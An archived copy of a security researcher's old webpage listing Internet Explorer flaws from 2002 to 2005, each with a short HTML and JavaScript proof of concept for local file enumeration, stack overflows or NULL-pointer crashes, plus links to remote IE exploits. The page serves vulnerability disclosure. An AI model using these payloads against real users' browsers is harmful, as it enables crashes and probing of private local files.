Www.edup.tudelft.nl/~bjwever/advisory ie flaws.html.php
From Skypher
← Back to www.edup.tudelft.nl/~bjwever/Warning
This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that is very likely to be chuck-full of spelling errors.
This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that is very likely to be chuck-full of spelling errors.
Archive of MSIE flaws
Local javascript file enumeration using valid JavaScript-file successfull load detection
Date: 2005-01-14
<HTML>
<SCRIPT src="...valid local JavaScript file..."></SCRIPT>
<SCRIPT>if (global_variable) alert("found");</SCRIPT>
</HTML>
Stack overflow exception using nested array sort() loop
Date: 2004-10-20
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
"Object.method in for-loop" NULL-pointer exception
Date: 2004-07-11
<HTML>
<SCRIPT language="javascript">
for (a in window.open) { }
</SCRIPT>
</HTML>
Read exception using filename containing 0xFE byte for drive letter
Date: 2004-05-07, discovery by: Emmanouel Kellinis
<HTLM> <BODY> <IFRAME src="file://รพ:/"> </BODY> </HTML>
Page-Enter, blendTrans() NULL-pointer exception
Date: 2002-07-12
<HTML style="width:expression(navigate('?#'))">
<HEAD>
<META http-equiv="Page-Enter" content="blendTrans()">
</HEAD>
</HTML>
Local image file enumeration using IMG.src and .onload successfull load detection
Date: 2002-04-19
<HTML> <IMG src="...local image file..." onLoad="alert(\"found\");"></SCRIPT> </HTML>
Stack overflow exception using IMG.src and .onerror loop
Date: 2002-03-24
- (Was fixed but still works by running the script twice)
<HTML> <BODY> <IMG src="::" onError="this.src=this.src;"> <IMG src="::" onError="this.src=this.src;"> </BODY> </HTML>
Local file enumeration using window.onerror and SCRIPT.src JavaScript error detection
Date: 2002-01-03, discovery by: Tom Micklovitch
<HTML>
<SCRIPT>window.onerror = new Function("alert(\"found\"); return true;");</SCRIPT>
<SCRIPT src="...local non-JavaScript file..."></SCRIPT>
</HTML>
Links
- IFRAME src&name property BoF: Advisory on Internet Explorer remote compromise.
- Internet Exploiter 1: Remote exploit for Internet Explorer IFRAME src&name property BoF.
- Internet Exploiter 3: Remote exploit for Internet Explorer .ANI file Animation Header Length BoF.
